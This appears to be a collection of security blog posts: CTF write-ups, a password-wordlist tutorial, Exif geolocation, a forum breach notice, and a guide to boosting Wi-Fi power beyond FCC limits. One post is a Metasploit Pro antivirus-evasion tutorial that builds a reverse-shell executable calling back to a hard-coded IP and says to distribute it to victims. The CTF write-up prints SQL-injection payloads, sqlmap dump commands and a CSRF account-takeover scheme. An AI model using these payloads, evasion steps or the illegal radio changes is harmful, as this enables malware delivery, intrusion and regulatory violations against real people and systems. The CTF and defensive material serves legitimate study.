NYU-Poly’s Cyber Security Awareness Week (CSAW) Capture the Flag (CTF) event was held this year from September 19-22. This CTF is geared towards undergrads looking to break into security, however the event provides some decent challenges for professionals.
Unfortunately, I wasn’t able to dedicate as much time to the contest as I would have like to due to some personal obligations but I was able to knock out quite a few challenges. The solutions and explanations follow.
Trivia 1 – 50 points
Challenge: “Drink all the booze, ____ all the things!”
Answer: hack
Explanation: Lyrics from Dual Core’s “All The Things.” http://www.youtube.com/watch?v=FoUWHfh733Y
Trivia 2 – 50 points
Challenge: “What is the abbreviation of the research published in the Hackin9 issue on nmap by Jon Oberheide, Nico Waisman, Matthieu Suiche, Chris Valasek, Yarochkin Fyodor, the Grugq, Jonathan Brossard, and Mark Dowd?”
Answer: DICKS
Explanation: The title of the Hackin9 article was “Nmap: The Internet Considered Harmful - DARPA Inference Cheking Kludge Scanning”
http://www.theregister.co.uk/2012/10/05/hakin9_silliness/
Trivia 3 – 50 points
Challenge: “What is the common name for a single grouping of instructions used in a Return Oriented Programming payload, typically ending in a return (ret) instruction?”
Answer: gadget
Explanation: http://en.wikipedia.org/wiki/Return-oriented_programming
Trivia 4 – 50 points
Challenge: “What is the new web technology that provides a web browser full-duplex communication to a web server over a single connection?”
Answer: WebSocket
Explanation: http://www.websocket.org/aboutwebsocket.html
Trivia 5 – 50 points
Challenge: “What is the x86 processor operating mode for running 64-bit code?”
Answer: long mode
Explanation: http://wiki.osdev.org/X86-64#Long_Mode
Web 1 – 100 points
Challenge: This challenge required you to “guess” the password for the admin user.
Answer: told_ya_you_wouldnt_guess_it
Method: Using a proxy such as Burp, intercept the POST when logging in and change the cookie value to “admin=true”. Once logged in, the flag will be presented.
Exploitation1 – 100 points
Challenge: An IP address and a port were provided as well as two files.
Answer: 7c1fbb502632bffa6e62ba6fa847681f
Method: Netcat to the IP/Port specified in the challenge description and then send data greater than 4096 bytes (I used A’s). This will return the flag and close the connection.
Misc. 1 – 50 points
Challenge: A PCAP file was provided.
Answer: d316759c281bf925d600be698a4973d5 –
Method: The PCAP includes Telnet traffic, so using Wireshark I followed the TCP stream and the flag was in the traffic.
Misc. 2 – 50 points
Challenge: 2 files were provided, networking.pcap and networking.pcap.process
Answer: f9b43c9e9c05be5e08ea163007af5144 –
Method: Catted the networking.pcap.process file and it was littered with the flag.
Crunch is a wordlist generator project which can create long and complex lists to audit the strength of passwords. This tool also affords a great level of control in creating wordlists, allowing users to control the characters used, minimum and maximum lengths, and specify certain patterns. It is designed to be used with Linux, so support for Windows/BSD/OS X is unknown.
Installation
To install Crunch, first download the latest version (currently 3.4) from Sourceforge.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.4.tgz/download
Then extract the files from the archive.
tar -xvf crunch-3.4.tar.gz
Finally, change into the new Crunch directory and install the tool.
cd crunch-3.4
make && make install
Usage
You can check the user manual by using the man command. Basic usage is as follows
./crunch [min length] [max length] [character set] [options]
Examples:
Create a list of all lowercase alpha passwords 3 characters in length:
./crunch 3 3
Create a list of passwords 4 characters in length using only 1, 2, 3, A, B, C, and D:
./crunch 4 4 123ABCD
Create the same list as above, including the special characters $, %, and &:
./crunch 4 4 123ABCD\$\%amp;
Send the output of the previous command to a file and zip it in the 7zip format:
./crunch 4 4 123ABCD\$\%amp; -o new_wordlist.txt -z 7z
Use the rainbow tables character sets file (charset.txt) to create a list of passwords 4-8 characters in length including upper, lower, numerical and special:
./crunch 4 8 -f charset.txt mixalpha-numeric-all
Note: charset.txt can be found here
http://www.youtube.com/watch?v=V3_pmuJRs84
Exchangeable image file format, or Exif, is a standard for storing information in image files. Most digital cameras, including smartphones, use Exif annotations. Some of the information stored includes exposure time, shutter speed, and F number, but more important to us is the date and time the photo was taken as well as GPS information. This information can be used to identify when and where a photo was taken, an obvious security concern.
Granted, this is relatively old news but still relevant due to the sheer number of iPhones out there and the fact that you have to explicitly decline geotagging on those devices.
In this post, I’m going to show how to retrieve this data from a photo and extract the useful information to track down when and where a photo was taken.
The first thing to do is to install exiftools. Do this with the following command.
sudo apt-get install libimage-exiftool-perl
Once that is installed, grab the picture you want to analyze. It must be in either .TIF or .JPG format or you will not be able to pull the data. Put the picture somewhere easy to remember and run this command:
exifdata -a photo.JPG
This will display all of the Exif data available. There are a few key fields to look for:
- Make
- Camera Model Name
- Create Date
- GPS Latitude
- GPS Longitude
Instead of parsing through all of that information for every photo, the following command will extract all of that information we care about.
exiftool -a -make -model -DateTimeOriginal -gps:all photo.JPG
This will present the information like so.
Make : Apple
Camera Model Name : iPhone 5
Date/Time Original : 2013:06:10 13:55:46
GPS LatitudRee Ref : North
GPS Latitude : 25 deg 11' 50.2152"
GPS Longitude Ref : East
GPS Longitude : 55 deg 16' 27.2208"
GPS Altitude Ref : Above Sea Level
GPS Altitude : 835.8427653 m
GPS Time Stamp : 09:55:45.73
GPS Img Direction Ref : True North
GPS Img Direction : 5.834875116
Now this information can be taken to Google Maps/Earth and you can locate where that photo was taken within a few meters. For the sample above, this is what you should see:
Remediation
Luckily this is very easy to fix on the iPhone. To avoid this happening to you, go into Settings > Privacy > Location Services and make sure the slider next to Camera is set to “OFF.” Now GPS tags will not be added to your photos. If you alread have a photo you would like to remove the geotags from, issue the following command.
exiftool -a -gps:all= /Path/To/Image.JPG
At 20:11UTC, a defacement of the Ubuntu Forums was reported to Canonical and at 20:15UTC the site was taken down and replaced with a splash page. According to the official Canonical statement, the attack method used in the breach is still unknown. The statement also states:
- We have confirmed the attackers were able to access all user email addresses and hashed passwords on the Forums site. While the passwords were not stored in plain text, good practice dictates that users should assume the passwords have been accessed and change them. If users used the same password on other services they should immediately change that password.
- We believe the issue is limited to the Ubuntu Forums and no other Ubuntu or Canonical site or service is affected.
- We have begun the process of notifying by email all users whose details have been compromised.
If you are affected by this breach, now would be the time to update your passwords of other services, especially if you duplicate passwords. I will update this post as more information becomes available.
I was reading through the talks that were selected for Black Hat USA this year and picked out a few that I found interesting. If you are going, I would recommend seeing these if at all possible and if you cannot, they should be posted online within a few months. I’ve linked each title to the description on the Black Hat website.
NOTE: The methods described in this tutorial are illegal in the United States. I cannot be held responsible for what you choose to do with this information. Please see FCC Title 47, Section 15.247 for more information on RF regulations and limitations within the US.
I recently learned about a little trick for getting the most out of directional wifi antennas. In the US, the FCC prohibits devices with a maximum Equivalent Isotropically Radiated Power (EIRP) greater than 36dBm (4 Watts). This is calculated by adding the antenna gain and the device’s output power. The table below shows some examples.
Antenna
Gain (dBi) |
Device Output
Power Allowed |
EIRP
(dBm) |
EIRP
(Watts) |
6 |
30dBm or 1000mW |
36 |
4 |
9 |
27dBm or 500mW |
36 |
4 |
12 |
24dBm or 250mW |
36 |
4 |
15 |
21dBm or 125mW |
36 |
4 |
So by giving a high-gain device more power, say all the way up to 1W (1000mW), you could go past this EIRP limit and increase the strength of the signal. Mind you, this is not only illegal but can also cause a serious health hazard. So if you plan to try this, please read the FCC OET 65 guidlines for human safety.
Implementing this only takes a few commands. Linux’s iw command allows you to manipulate radios connected to your device very simply. The first thing to do is to connect your radio and find out which interface it comes up as. You can find this information with the iwconfig command. This is what mine looked like:
root@cubalo:~# iwconfig
lo no wireless extensions.
wlan1 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
The important field to watch is “Tx-Power.”
Now that we know the radio came up as wlan1, we can manipulate it by changing the country code and thus removing the FCC restrictions. For example’s sake, we will change the country code to Bolivia, but in theory you could change it to whatever ISO 3166-alpha2 country code you want.
ifconfig wlan1 down
iw reg set BO
Now you are free to up the power and you can also use higher channels than the FCC allows in the States. Make sure to set the tx power to use the maximum output possible. My radio can handle 1000mW (1W), so I will use 30dBm in the command below, but you can change that to suit your needs. To change the tx power and bring the interface back up, use the following command:
iwconfig wlan1 txpower 30
ifconfig wlan1 up
Finally, check the interface’s configuration again and verify that the Tx-Power field has changed.
root@cubalo:~# iwconfig wlan1
wlan1 IEEE 802.11abgn ESSID:off/any
Mode:Managed Frequency:2.472 GHz Access Point: Not-Associated
Tx-Power=30 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
For more information about manipulating the radio, read the Linux wireless documentation.
On June 12, the Open Web Application Security Project (OWASP) released an updated list of the top 10 web application vulnerabilities facing developers. This is the first major update to the list since 2010, which was well integrated into many web app testing frameworks and methodologies.
The OWASP Top 10 - 2013 is as follows:
For more information, head over to the OWASP Top 10 project page.
A while back, I posted a tutorial about basic antivirus evasion with Metasploit but the methods I described had a very high rate of detection. I figured it was since Metasploit’s payloads are so well know that AV vendors have been able to get signatures for a large majority of the payloads that have been encoded, packed, etc, rendering them virtually unusable.
Now, if your work buys you toys like mine does it is possible that you have access to Metasploit Pro (the paid version of Metasploit). It comes with a few cool gadgets like a web interface that allows you to manage “campaigns” as well as a few added exploits and payloads. However, we are specifically interested in one option: exploit/pro/windows/dynamic_exe
Start by firing up the MSP console
msfpro
Then use the exploit/pro/windows/dynamic_exe option
use exploit/pro/windows/dynamic_exe
Then set the payload you want to use. I’ll use a Meterpreter reverse TCP for simplicity sake.
set PAYLOAD windows/meterpreter/reverse_tcp
Then set the options for the dynamic executable template
set FILENAME evil.exe
set SERVICE false
These options set the file name to evil.exe and makes sure that the new executable is not a service EXE (haven’t had much luck with that.)
Finally, set your standard Meterpreter options
set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit
Once you tell it to exploit, MSP will drop the executable under your home directory (/root/.msf4/local/evil.exe on a default Kali install)
Now that you have a file to distribute to your victims, set up a simple MSP/F listener with the same details you set when building the exe.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit -j (I suggest running this as a job as there may be slow turnaround)
All that is left to do is to distribute that evil.exe file to your victims and wait for someone to click it. Once it is opened, you will see a standard Meterpreter session opened on your listening box.
A quick note, PLEASE DO NOT SUBMIT WHATEVER PAYLOAD, EXECUTABLE, ETC YOU CREATE TO VIRUSTOTAL!
PlaidCTF 2013 was a capture the flag tournament put on by the Plaid Parliament of Pwning and sponsored by ENDGAME. Unfortunately, I was unable to commit 100% to the CTF due to being under the weather and having family in town, but I figured I’d share what I solved. Most of the challenges were reverse engineering and forensics (not my strongest points), but it was fun nonetheless.
charsheet (Web - 150)
Problem: My friend is in my D&D campaign - could you get me his character name? He administrates this site. Or here (faster).
On the site, there is a RPG Web Profiler app that catalouges RPG characters and their campaigns. The goal is the find the user who admins the site.
That meant that I needed to find a listing of all users in the game. The problem is that users can choose whether or not to make their profile public (only about 45 at the time of completion did) so I had to find a way to either make users change their profile to public, of get a full listing of active users from the backend database.
At first, I signed into my profile and found a section where you could set your profile image from a file out on the web, so I figured why not try some CSRF? I inserted a URL that would set a user’s profile to “Public” and saved. As users would hit my profile, it would make their profile Public and anyone could access it.
The problem with this though was that I had to hope the admin user was live and would hit my profile. To make the likelihood of getting that admin user to give up their privacy, I changed my CSRF link to a URL that would transfer ownership of the account to me. Once I had compromised an account, I would change their profile picture to the CSRF that would make a user switch to “Public.”
I quickly found that although effective, it would take a long time to complete so I started to explore other options.
I found a search field and tried a basic ” ’ Or 1=1-” on it and it threw an error! Woohoo!
So now I knew that there was a vulnerable MySQL server running in the background. I tried my luck with a raw connection to the database, but no dice so I fired up sqlmap and got to work.
I pointed it at the site with the following string:
./sqlmap.py -u "http://54.234.77.50/search.php?type=contains&cname=1"
and compromised the database with the string:
type=contains&cname=1') UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,105,116,113,58),CHAR(79,71,65,69,80,88,106,99,66,67),CHAR(58,102,118,121,58)), NULL, NULL# AND ('kCbZ'='kCbZ
---
So now all I had to do was run through the database, find the table I wanted and then dump it. Long story short, this was the syntax to do just that:
/sqlmap.py -u "http://54.234.77.50/search.php?type=contains&cname=1" -D "charsheet" -T "characters" --dump
This dumped a CSV file to the output folder and had three columns with names that could possibly be flags: cname, edited_by, and owner.
I combined all of these columns into a file and then left only the unique ones in it with this command:
sort characters.txt | uniq -u
Finally, I pumped this list of about 120 entries to Burp Suite’s intruder, set it up to submit to the proper location, and started it. Within about 2 minutes the challenge was complete.
Answer: r3al50ftwar3ftw
Unnnnlucky (Misc - 20)
Problem: Where does The Plague hide his money?
This is a reference to the movie Hackers (1995). Unfortunately, the only way to know the answer to this is to have watched the movie.
Answer: 03087-08351-27H